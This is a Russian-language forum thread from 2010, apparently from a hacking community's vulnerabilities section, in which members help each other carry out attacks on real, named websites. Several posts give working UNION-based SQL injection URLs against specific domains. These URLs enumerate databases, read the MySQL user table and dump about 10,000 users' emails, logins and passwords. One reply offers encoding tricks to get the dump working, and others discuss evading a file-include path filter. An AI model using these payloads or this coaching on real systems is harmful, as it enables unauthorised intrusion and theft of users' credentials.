HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15501  
Старый 03.11.2010, 16:31
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от budden  
Есть инклуд (линукс), но слэш (/) вырезается. Никаких других способов подняться на директорию вверх (../) нет, ведь?
/thread98525.html

хотья не факт..
 
Ответить с цитированием

  #15502  
Старый 03.11.2010, 16:33
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию

Цитата:
Сообщение от None  
Вот так перебрал до 50, результат - ничего не найдено
Дальше терпения не хватило? Или ты думаешь, что всё заканчивается на 50-ой таблице? =\

Цитата:
Сообщение от None  
Table 'krost.USER' doesn't exist
Таблица в другой бд

http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,table_schema,4,5,database(),7,8,9+from+i nformation_schema.columns+where+table_name='USER'+ limit+1,100+--+

Запрос к этой таблице в бд mysql

http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,3,4,5,6,7,8,9+from+mysql.user+--+
 
Ответить с цитированием

  #15503  
Старый 03.11.2010, 16:46
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от budden  
Есть инклуд (линукс), но слэш (/) вырезается. Никаких других способов подняться на директорию вверх (../) нет, ведь?
https://rdot.org/forum/showpost.php?p=3323&postcount=16
 
Ответить с цитированием

  #15504  
Старый 03.11.2010, 16:56
Чакэ
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
Провел на форуме:
90728

Репутация: 62
По умолчанию

nimferus, смотри позицию последней table_column через метод тыка аля limit 1000,1 - false делим на 2 limit 500,1 - true значит больше 500 и меньше 1000, limit 750,1 - false.. ну ты понел.. когда знаем точное число запускаем цикл аля for(int i=0;i
 
Ответить с цитированием

  #15505  
Старый 03.11.2010, 17:56
brutos
Новичок
Регистрация: 25.11.2009
Сообщений: 0
Провел на форуме:
68379

Репутация: 0
По умолчанию

Цитата:
Сообщение от Чакэ  
nimferus, смотри позицию последней table_column через метод тыка аля limit 1000,1 - false делим на 2 limit 500,1 - true значит больше 500 и меньше 1000, limit 750,1 - false.. ну ты понел..
Это что еще за изврат?!

select count(*) from information_schema.columns

И все!
 
Ответить с цитированием

  #15506  
Старый 03.11.2010, 18:17
nimferus
Новичок
Регистрация: 02.11.2010
Сообщений: 5
Провел на форуме:
1094

Репутация: 0
По умолчанию

Всем спасибо, немного разобрался, пойду дальше пыхтеть)
 
Ответить с цитированием

  #15507  
Старый 03.11.2010, 21:21
Чакэ
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
Провел на форуме:
90728

Репутация: 62
По умолчанию

Цитата:
Сообщение от brutos  
Это что еще за изврат?!
select count(*) from information_schema.columns
И все!
извините ступил.. вроде sql не первый год юзаю а в скуль не додумался такое ставить.. черт.
 
Ответить с цитированием

  #15508  
Старый 03.11.2010, 22:25
ALIM
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855

Репутация: 0
По умолчанию

есть 2 базы

inform.schema

data

делаю такой запрос:

http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users --

пишет что не существует поля email

http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users.data --

и так

http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from data.users --

тоже самое

Помогите разобраться с запросом, через тулзу по одному не вариант в базе 10k юзеров
 
Ответить с цитированием

  #15509  
Старый 03.11.2010, 22:35
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

Цитата:
Сообщение от ALIM  
есть 2 базы
inform.schema
data
делаю такой запрос:
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users --
пишет что не существует поля email
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from users.data --
и так
http://www.sffaoss.om/index.php?id=-24 union select 1,2, group_concat(email,0x3a,login,0x3a,password),4,5 from data.users --
тоже самое
Помогите разобраться с запросом, через тулзу по одному не вариант в базе 10k юзеров
попробуй unhex(hex()) , aes_encrypt
 
Ответить с цитированием

  #15510  
Старый 03.11.2010, 22:51
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056

Репутация: 1089


По умолчанию

Цитата:
Сообщение от ALIM  
Помогите разобраться с запросом,
Как здесь можно помочь разобраться с запросом- если мы не знаем настоящую ссылку? Ведь насколько я помню доменная зона

om обычно используется с приставкой net (net.om) покрайней мере по твоей ссылке зайти не могу и гугл домен sffaoss.om - незнает.....

P.S. Или это только у меня ???
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.